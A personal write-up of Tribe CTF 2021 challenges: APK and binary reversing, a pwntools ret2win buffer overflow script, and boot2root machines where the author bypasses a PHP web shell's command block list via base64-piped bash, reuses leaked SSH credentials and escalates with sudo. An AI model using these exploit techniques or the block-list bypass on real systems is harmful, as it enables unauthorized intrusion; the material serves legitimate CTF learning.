Tribe CTF 2021 "The Decomposition"

This Category had various of challenges which were based on Reverse engineering , Pwn , and Boot2Root machines , and I was able to do all except of two pwn challenges LOL, I suck at pwn ;P

BITS AND BYTES

This challenge had an attachment which was an android apk file , and I was to reverse engineer it , and get the flag the description was as follows:

Most security-aware developers use a byte array trick to hide api keys and other sensitive info in the application. I challenge you to get the flag :)

It has 50 points and it has 6 solves , so let's break it down , I first decided to unzip it and then , I decided to use the tree command to list down all directories and what's inside them:

│   ├── layout-v26
│   │   ├── abc_screen_toolbar.xml
│   │   └── mtrl_calendar_month.xml
│   ├── layout-watch-v20
│   │   ├── abc_alert_dialog_button_bar_material.xml
│   │   └── abc_alert_dialog_title_material.xml
│   ├── mipmap-anydpi-v26
│   │   ├── ic_launcher_round.xml
│   │   └── ic_launcher.xml
│   ├── mipmap-hdpi-v4
│   │   ├── ic_launcher_round.webp
│   │   └── ic_launcher.webp
│   ├── mipmap-mdpi-v4
│   │   ├── ic_launcher_round.webp
│   │   └── ic_launcher.webp
│   ├── mipmap-xhdpi-v4
│   │   ├── ic_launcher_round.webp
│   │   └── ic_launcher.webp
│   ├── mipmap-xxhdpi-v4
│   │   ├── ic_launcher_round.webp
│   │   └── ic_launcher.webp
│   ├── mipmap-xxxhdpi-v4
│   │   ├── ic_launcher_round.webp
│   │   └── ic_launcher.webp
│   ├── raw
│   │   └── oauth.txt
│   └── xml
│       ├── standalone_badge_gravity_bottom_end.xml
│       ├── standalone_badge_gravity_bottom_start.xml
│       ├── standalone_badge_gravity_top_start.xml
│       ├── standalone_badge_offset.xml
│       └── standalone_badge.xml
└── resources.arsc

and inside /res/raw/ there is a oauth.txt , STRANGE , why would such a file exist , so I decide to read what's inside it :

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/bits_and_bytes]
└─$ cat res/raw/oauth.txt 
116 114 105 98 101 99 116 102 123 98 121 116 101 95 97 114 114 97 121 95 116 114 105 99 107 95 105 116 95 105 115 125

and there it was decimals , so I decide to change them back to strings and finally I get the flag:

tribectf{byte_array_trick_it_is}

BOF

This challenge was an executable but ARM based with 100 points , the description was as follow:

This challenge is based on basic arm based stack buffer overflow

I try executing the binary in my system but doesn't work so then I decide to check the strings , and inside the strings I get the flag

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev]
└─$ rabin2 -z bof 
[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00000550 0x00010550 36  37   .rodata ascii tribectf{alwayz_sanitize_user_input}
1   0x0000057c 0x0001057c 16  17   .rodata ascii You entered: %s\n

FLAG : tribectf{alwayz_sanitize_user_input}

ButterOverflow

A bufferoverflow vulnerable type challenge , it was attached with a binary , the description was as follows:

Where there is a buffer overflow there is a way. checkout this target: 191.101.169.29:9090

It had 50 points , I downloaded the file to examine it on my system:

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ ./butteroverflow 
Overflow me: AAAAA
Oops! Did not work.

So I pulled this binary up in gdb for more analysis , first I try to check the functions:

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ gdb -q butteroverflow
Reading symbols from butteroverflow...
(No debugging symbols found in butteroverflow)
gdb-peda$ info functions
All defined functions:

Non-debugging symbols:
0x0000000000401000  _init
0x0000000000401030  puts@plt
0x0000000000401040  printf@plt
0x0000000000401050  fgets@plt
0x0000000000401060  gets@plt
0x0000000000401070  setvbuf@plt
0x0000000000401080  fopen@plt
0x0000000000401090  exit@plt
0x00000000004010a0  _start
0x00000000004010d0  _dl_relocate_static_pie
0x00000000004010e0  deregister_tm_clones
0x0000000000401110  register_tm_clones
0x0000000000401150  __do_global_dtors_aux
0x0000000000401180  frame_dummy
0x0000000000401182  win
0x00000000004011ee  init
0x0000000000401231  main
0x00000000004012a0  __libc_csu_init
0x0000000000401300  __libc_csu_fini
0x0000000000401304  _fini

So we have main , and win functions that are insteresting, so I try breaking down the main function in radare2:

and we can fully see now what's happening the more fascinating part of all is how it compares rax with rdx and then jumps if not as expected or calls the sym.win function, I know read the sym.win function:

[0x7f2b1fb55050]> pdf @sym.win
            ; CALL XREF from main @ 0x40127b
┌ 108: sym.win ();
│           ; var int64_t var_30h @ rbp-0x30
│           ; var int64_t var_8h @ rbp-0x8
│           0x00401182      55             push rbp
│           0x00401183      4889e5         mov rbp, rsp
│           0x00401186      4883ec30       sub rsp, 0x30
│           0x0040118a      488d35770e00.  lea rsi, [0x00402008]       ; "r"
│           0x00401191      488d3d720e00.  lea rdi, str.flag.txt       ; 0x40200a ; "flag.txt"
│           0x00401198      e8e3feffff     call sym.imp.fopen          ; file*fopen(const char *filename, const char *mode)                                                                                                               
│           0x0040119d      488945f8       mov qword [var_8h], rax
│           0x004011a1      48837df800     cmp qword [var_8h], 0
│       ┌─< 0x004011a6      7516           jne 0x4011be
│       │   0x004011a8      488d3d690e00.  lea rdi, str.There_was_an_error_opening_the_file._Contact_admin_if_it_doesnt_work_on_the_server_:_ ; 0x402018 ; "There was an error opening the file. Contact admin if it doesnt work on the server :)"                                                                                                             
│       │   0x004011af      e87cfeffff     call sym.imp.puts           ; int puts(const char *s)
│       │   0x004011b4      bf01000000     mov edi, 1
│       │   0x004011b9      e8d2feffff     call sym.imp.exit           ; void exit(int status)
│       └─> 0x004011be      488b55f8       mov rdx, qword [var_8h]
│           0x004011c2      488d45d0       lea rax, [var_30h]
│           0x004011c6      be1e000000     mov esi, 0x1e               ; 30
│           0x004011cb      4889c7         mov rdi, rax
│           0x004011ce      e87dfeffff     call sym.imp.fgets          ; char *fgets(char *s, int size, FILE *stream)
│           0x004011d3      488d45d0       lea rax, [var_30h]
│           0x004011d7      4889c6         mov rsi, rax
│           0x004011da      488d3d8d0e00.  lea rdi, str.flag:__s__n    ; 0x40206e ; "flag: %s \n"
│           0x004011e1      b800000000     mov eax, 0
│           0x004011e6      e855feffff     call sym.imp.printf         ; int printf(const char *format)
│           0x004011eb      90             nop
│           0x004011ec      c9             leave
└           0x004011ed      c3             ret

and here now I understand how it all works from the decompiled code of the main function:

undefined8 main(void)
{
    char *s;
    
    init();
    printf("Overflow me: ");
    gets(&s);
    if (_target == 0xdeadbeef) {
        win();
    } else {
        puts("Oops! Did not work.");
    }
    return 0;
}

set one variable s with type char but then compare _target with 0xdeadbeef if that's equal to each other then it calls the win() or else it prints out the error, turns out this binary isn't secure at all so I then make my own flag.txt and now do dynamic analysis, but first I try find the offset :

so the offset is 32 ! Now then since we know the offset we have the address of win , and the address of main and since the binary isn't protected I just wrote a fast script to test it locally :

#!/usr/bin/python3

# author : tahaafarooq

from pwn import *

#p = remote('191.101.169.29', 9090)
p = process('./butteroverflow')
win_addr = 0x401182
main = 0x401294
offset = 32

overflow = b'A'*offset

payload = overflow
payload += p64(main)
payload += p64(win_addr)

p.sendlineafter('Overflow me:', payload)

p.interactive()

I run it up and boom , unexpected I have the flag with the RET2WIN concept LEL:

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ python3 solver.py                                                                                                
[+] Starting local process './butteroverflow': pid 5589
/home/tahaafarooq/.local/lib/python3.9/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] Switching to interactive mode
 Oops! Did not work.
flag: helloworld
 
[*] Got EOF while reading in interactive

But tried running it on the remote binary but didn't work so I started adding up the offset "NOOB ALERT" , and I reached 40 and it worked!

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ python3 solver.py                                                                                                
[+] Opening connection to 191.101.169.29 on port 9090: Done
/home/tahaafarooq/.local/lib/python3.9/site-packages/pwnlib/tubes/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
[*] Switching to interactive mode
 Oops! Did not work.
flag: TRIBECTF{N@_5TR1NG5_4TT4CH3D} 
[*] Got EOF while reading in interactive

FLAG : TRIBECTF{N@_5TR1NG5_4TT4CH3D}

Fixme

Description:

there have been tricks used to disguise malware on this artifact can you discover the hidden content

this challenge has 100 points , and it had an attachment with it, I first gather some information about the file because it was in .so format which confused me but then after a few command strokes:

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/artifact]
└─$ file fixme.so 
fixme.so: Zip archive data, at least v2.0 to extract

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/artifact]
└─$ xxd fixme.so | head -n 4
00000000: 504b 0304 1400 0808 0800 0000 2100 0000  PK..........!...
00000010: 0000 0000 0000 0000 0000 1400 0d00 4d45  ..............ME
00000020: 5441 2d49 4e46 2f4d 414e 4946 4553 542e  TA-INF/MANIFEST.
00000030: 4d46 5554 0500 01d0 7bce 12fe ca00 00f3  MFUT....{.......

I realized it was an Zip archive file , so i unzip it , and I get the following:

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/artifact]
└─$ ls -la
total 4472
drwxr-xr-x  4 tahaafarooq sudo    4096 Oct 25 08:17 .
drwxr-xr-x 10 tahaafarooq sudo    4096 Oct 25 07:11 ..
-rw-r--r--  1 tahaafarooq sudo 4557522 Oct 23 14:09 fixme.so
-rw-r--r--  1 tahaafarooq sudo     664 Dec 31  1979 GimmeheadKt.class
drwxr-xr-x 22 tahaafarooq sudo    4096 Oct 25 08:17 kotlin
drwxr-xr-x  4 tahaafarooq sudo    4096 Oct 25 08:17 META-INF

First thing I try to read GimmeheadKt.class :

And boom I got the flag soo unexpected:))

FLAG : tribectf{i_knew_youd_fix_me:)}

HEART 1

Description:

Daniel Hale Williams is standing up a new web server to support the opening of his health organization “Cardio Center”. Take a look to see if there are any issues he should address before making it public. Target Address : 191.101.169.219

Now it's a machine:} , so I first perform a network scan:

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/heart]
└─$ nmap -A 191.101.169.219 -oN nmap-sacn
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-25 08:24 EDT
Nmap scan report for mail.beerclues.com (191.101.169.219)
Host is up (0.24s latency).
Not shown: 996 filtered ports
PORT   STATE SERVICE    VERSION
21/tcp open  tcpwrapped
22/tcp open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 6e:49:d3:94:be:0c:04:e2:e9:2d:ef:e5:a9:4c:1b:b9 (RSA)
|   256 2c:2a:69:78:b7:ab:0c:83:80:01:3c:80:4f:f4:77:15 (ECDSA)
|_  256 7c:e7:04:cc:ad:d9:d2:5e:c3:7a:5b:06:98:fc:1d:54 (ED25519)
25/tcp open  smtp       Postfix smtpd
|_smtp-commands: heart, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING, 
| ssl-cert: Subject: commonName=heart
| Subject Alternative Name: DNS:heart
| Not valid before: 2021-10-11T21:02:25
|_Not valid after:  2031-10-09T21:02:25
|_ssl-date: TLS randomness does not represent time
80/tcp open  http       Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/images/DHW.jpg /development.txt
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Cardiology Website Template
Service Info: Host:  heart; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.18 seconds

So we have 4 ports open , including 80 which has a robots.txt with some interesting information , I open the site on the web, and then I curl robots.txt

┌──(tahaafarooq㉿kali)-[~]
└─$ curl --request GET http://191.101.169.219/robots.txt
User-agent: *
Disallow: /images/DHW.jpg
Disallow: /development.txt

I now read the development.txt file and see what's inside it:

┌──(tahaafarooq㉿kali)-[~]
└─$ curl --request GET http://191.101.169.219/development.txt
The annoying Hospital administrators said I needed to move my development files. 
I have moved one of the files to old.php

wow so we have a file named old.php that requires attention, and attention it shall get:)

┌──(tahaafarooq㉿kali)-[~]
└─$ curl --request GET http://191.101.169.219/old.php
<html>
<body>
    <style>
    #back{
      position: fixed;
      top: 0;
      left: 0;
      min-width: 100%;
      min-height: 100%;
      z-index:-10
    }
      #shell{
        color: white;
        text-align: center;
    }
  </style>
   <!-- TRIBECTF{Ch1ef_Surg30n_@t_Freedmen} -->
  <div id="shell">
    <h2>
      dev_shell
    </h2>
    <form action="dev_shell.php" method="post">
      Command: <input type="text" name="in_command" /> <br>
      <input type="submit" value="submit">
    </form>
    <br>
    <h5>Output:</h5>
      </div>
    <img src="dev_shell_back.png" id="back" alt="">
</body>
</html>

So I got the Heart 1 Flag: TRIBECTF{Ch1ef_Surg30n_@t_Freedmen}

HEART 2

From last we checked on old.php it looks like a web shell , so I now try to play around with it and see what I can do:

┌──(tahaafarooq㉿kali)-[~]
└─$ curl --request POST http://191.101.169.219/dev_shell.php? -d "in_command=whoami"
<html>
<body>
    <style>
    #back{
      position: fixed;
      top: 0;
      left: 0;
      min-width: 100%;
      min-height: 100%;
      z-index:-10
    }
      #shell{
        color: white;
        text-align: center;
    }
  </style>
  <!-- WIP, don't forget to report any bugs we don't want another breach guys-->
  <div id="shell">
    <h2>
      dev_shell
    </h2>
    <form action="dev_shell.php" method="post">
      Command: <input type="text" name="in_command" /> <br>
      <input type="submit" value="submit">
    </form>
    <br>
    <h5>Output:</h5>
    www-data
  </div>
    <img src="dev_shell_back.png" id="back" alt="">
</body>
</html>

okay so it works now let's try listing dir and files:

<h5>Output:</h5>
    Get out skid lol

alright that didn't work out perfect so they blacklisted some commands:} , I then try reading old.php using the less commands and looks like blacklisting isn't the way to go:)

<?php
    //inspired by c0rruptedb1t
    $invalid = 0;
    $command = ($_POST['in_command']);
    $bad_words = array("pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc");
  ?>
  <style>
    #back{
      position: fixed;
      top: 0;
      left: 0;
      min-width: 100%;
      min-height: 100%;
      z-index:-10
    }
      #shell{
        color: white;
        text-align: center;
    }
  </style>
  <!-- WIP, don't forget to report any bugs we don't want another breach guys-->
  <div id="shell">
    <h2>
      dev_shell
    </h2>
    <form action="dev_shell.php" method="post">
      Command: <input type="text" name="in_command" /> <br>
      <input type="submit" value="submit">
    </form>
    <br>
    <h5>Output:</h5>
    <?php
    system("running command...");
      //executes system Command
      //checks for sneaky ;
      if (strpos($command, ';') !==false){
        system("echo Nice try skid, but you will never get through this bulletproof php code"); //doesn't work :P
      }
      else{
        $is_he_a_bad_man = explode(' ', trim($command));
        //checks for dangerous commands
        if (in_array($is_he_a_bad_man[0], $bad_words)){
          system("echo Get out skid lol");
        }
        else{
          system($_POST['in_command']);
        }
      }
    ?>

I now know the blacklisted words, so what I do now is try get to list the DIR with base64:

MY machine:

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ echo "ls -la" | base64 
bHMgLWxhCg==

WEB SHELL:

┌──(tahaafarooq㉿kali)-[~]
└─$ curl --request POST http://191.101.169.219/dev_shell.php? -d "in_command=echo 'bHMgLWxhCg==' | base64 -d | bash"
<html>
<body>
    <style>
    #back{
      position: fixed;
      top: 0;
      left: 0;
      min-width: 100%;
      min-height: 100%;
      z-index:-10
    }
      #shell{
        color: white;
        text-align: center;
    }
  </style>
  <!-- WIP, don't forget to report any bugs we don't want another breach guys-->
  <div id="shell">
    <h2>
      dev_shell
    </h2>
    <form action="dev_shell.php" method="post">
      Command: <input type="text" name="in_command" /> <br>
      <input type="submit" value="submit">
    </form>
    <br>
    <h5>Output:</h5>
    total 1260
drwxr-xr-x 5 root root    4096 Oct 11 21:04 .
drwxr-xr-x 4 root root    4096 Oct 11 21:04 ..
-rw-r--r-- 1 root root    3559 Sep 21 19:45 about.html
-rw-r--r-- 1 root root    5562 Sep 21 19:45 blog-single.html
-rw-r--r-- 1 root root    6075 Sep 21 19:45 blog.html
-rw-r--r-- 1 root root    4039 Sep 21 19:45 contact.html
drwxr-xr-x 2 root root    4096 Sep 21 19:45 css
-rw-r--r-- 1 root root    1408 Sep 21 19:45 dev_shell.php
-rw-r--r-- 1 root root 1177950 Sep 21 19:45 dev_shell_back.png
-rw-r--r-- 1 root root     124 Sep 21 19:45 development.txt
-rw-r--r-- 1 root root    7231 Sep 21 19:45 doctors.html
drwxr-xr-x 7 root root    4096 Sep 21 19:45 fonts
-rw-r--r-- 1 root root    3805 Sep 21 19:45 forms.html
-rw-r--r-- 1 root root    3222 Sep 21 19:45 heart-monitoring-procedure.html
-rw-r--r-- 1 root root    4391 Sep 21 19:45 heart-monitoring.html
-rw-r--r-- 1 root root    2556 Sep 21 19:45 heart-treatments.html
drwxr-xr-x 2 root root    4096 Sep 21 19:45 images
-rw-r--r-- 1 root root    3218 Sep 21 19:45 index.html
-rw-r--r-- 1 root root     177 Sep 21 19:45 index.php
-rw-r--r-- 1 root root    1355 Sep 21 19:45 old.php
-rw-r--r-- 1 root root      67 Sep 21 19:45 robots.txt
-rw-r--r-- 1 root root    4880 Sep 21 19:45 services.html
-rw-r--r-- 1 root root     145 Sep 21 19:45 z_reminder.txt
  </div>
    <img src="dev_shell_back.png" id="back" alt="">
</body>
</html>

and there we have it :)) , There is an interesting text file z_reminder.txt I know try and read it!

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/butter_overflow]
└─$ curl --request GET http://191.101.169.219/z_reminder.txt
   I can remember the 12 parts of the human heart but not my password

   username: dhwilliams
   password: Pr0vident_h0spital

   ~D.H. Williams

And as seen we have creds , but then I remember we don't have any login portal in the website , but then I remember we got ssh so I guessed maybe they are ssh creds , let's try our luck!

┌──(tahaafarooq㉿kali)-[~]
└─$ ssh dhwilliams@191.101.169.219
dhwilliams@191.101.169.219's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-88-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 25 Oct 2021 12:46:18 PM UTC

  System load:  0.0                Processes:               231
  Usage of /:   41.1% of 19.56GB   Users logged in:         0
  Memory usage: 9%                 IPv4 address for ens160: 191.101.169.219
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

97 updates can be installed immediately.
1 of these updates is a security update.
To see these additional updates run: apt list --upgradable


*** System restart required ***
Last login: Mon Oct 25 04:33:50 2021 from 172.251.246.2
dhwilliams@heart:~$

And I am in:)), Now then with that done:)) , I find the second flag inside Desktop!

dhwilliams@heart:~$ cd Desktop
dhwilliams@heart:~/Desktop$ ls
flag2.txt
dhwilliams@heart:~/Desktop$ cat flag.txt
cat: flag.txt: No such file or directory
dhwilliams@heart:~/Desktop$ cat flag2.txt
TRIBECTF{Op3n3d_Fir$t_Int3rr@ci@l_H0spit@l}

FLAG:TRIBECTF{Op3n3d_Fir$t_Int3rr@ci@l_H0spit@l}

HEART 3

Now for the third flag , it must be inside the root directory so let's check what sudo privileges does our user have so as we know how we elevate our privileges:

dhwilliams@heart:~/Desktop$ sudo -l
[sudo] password for dhwilliams: 
Matching Defaults entries for dhwilliams on heart:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dhwilliams may run the following commands on heart:
    (ALL : ALL) ALL

Wow so we can just be root then LMAO:)) EZPIZI

root@heart:/home/root# cd Desktop
root@heart:/home/root/Desktop# ls
flag3.txt
root@heart:/home/root/Desktop# cat flag3.txt
TRIBECTF{Co-f0und3d_th3e_N@tion@l_M3dic@l_Associ@ti0n}

And there we go:))

FLAG: TRIBECTF{Co-f0und3d_th3e_N@tion@l_M3dic@l_Associ@ti0n}

Hello World

Description:

One of our fellow engineers came across a familiar encoding scheme in a malware sample and recreated it in his own binary. Some how he lost his file the original file. Can you help him figure out the encoding string to get the flag?

It's a reverse engineering challenge, So I try run the binary it asks for a password:

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev]
└─$ ./hello_world                                                                                                    
What is the password?: 1231333

That was Incorrect, try again!

I try read strings but nothing also:

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev]
└─$ rabin2 -z hello_world 
[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00002008 0x00002008 4   5    .rodata ascii \n%s\n
1   0x0000200d 0x0000200d 23  24   .rodata ascii What is the password?: 
2   0x00002028 0x00002028 31  32   .rodata ascii \nThat was Incorrect, try again!

then I try running the strings command and I find a weird pattern:

ABCDEFGHH
IJKLMNOPH
QRSTUVWXH
YZabcdefH
ghijklmnH
opqrstuvH
wxyz0123H
456789+/H
aGVsbG9fH
d29ybGRfH
ZnJvbV9SH
RQ==f

then I notice something that it says the alphabets in capital then small letters then comes a base64 string, so i write it somewhere else and it makes up aGVsbG9fd29ybGRfZnJvbV9SRQ== decoding it I got :

┌──(tahaafarooq㉿kali)-[~]
└─$ echo "aGVsbG9fd29ybGRfZnJvbV9SRQ==" | base64 -d
hello_world_from_RE

so the flag is FLAG : TRIBECTF{hello_world_from_RE}

Logd

Description:

most developers forget to turn off logging in production build and sensitive information such as OAuth tokens, passwords, and such can be simply found by looking at the application logs.

So we are also given an attachment of logd.txt and we have to get something out of it, and this was more than easy , and it had 75 points lol , I just cat out and I have the flag:

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev]
└─$ cat logd.txt 
##Develper 
Chalie/@Chal13W1zz

##challenge Type
Mobile

##Difficulty
Easy/sanity

## Logd
most developers forget to turn off logging in production build and sensitive information such as oauth tokens, passwords and such can be simply found by looking at the application logs.


## Challenge Artifact
logd.apk

## Challenge Solution
tribectf{always_look_for_low_hanging_fruits_in_android_logs}

##Hint
N/A

FLAG : tribectf{always_look_for_low_hanging_fruits_in_android_logs}

Pencil 1

Description:

John Lee Love is standing up a server to support all of his research on pencil sharpeners. Take a look to see if there are any issues he should address before making it public. Target IP: 191.101.169.9

This was also a machine, first thing I did was to scan the network of that IP:

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/pencil]
└─$ nmap -F 191.101.169.9
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-25 09:09 EDT
Nmap scan report for 191.101.169.9
Host is up (0.22s latency).
Not shown: 95 filtered ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 29.55 seconds

We have 3000 , 80 and 21, the most interesting ports of all , and hitting -A flag in nmap , we get that we can log in anonymously in port 21 so that's what I do now is to get access and there is a file inside it :

┌──(tahaafarooq㉿kali)-[~/Desktop/tribe_ctf/rev/pencil]
└─$ cat trapperkeeper.txt                                                                                                                                                                                                                    
What's do you call a broken pencil?
brokenpencil   P01ntl3ss

TRIBECTF{Ar3ntY0uSh@rp}

FLAG : TRIBECTF{Ar3ntY0uSh@rp}

SADLY WHILE WRITING THIS WRITEUP THEY TURNED OFF THE SERVERS FOR MACHINES AND ALL THAT SO I WILL END HERE:(

This was a really interesting CTF, I took second position as a solo

Contacts: twitter - @tahaafarooq

BITS AND BYTES

BOF

ButterOverflow

Fixme

HEART 1

HEART 2

HEART 3

Hello World

Logd

Pencil 1

Read more

UnderPass Hackthebox Writeup

Secret Writeup Hackthebox

DLINK DPH-400SE - Exposure of Sensitive Information to an Unauthorized Actor

File Transfer Tricks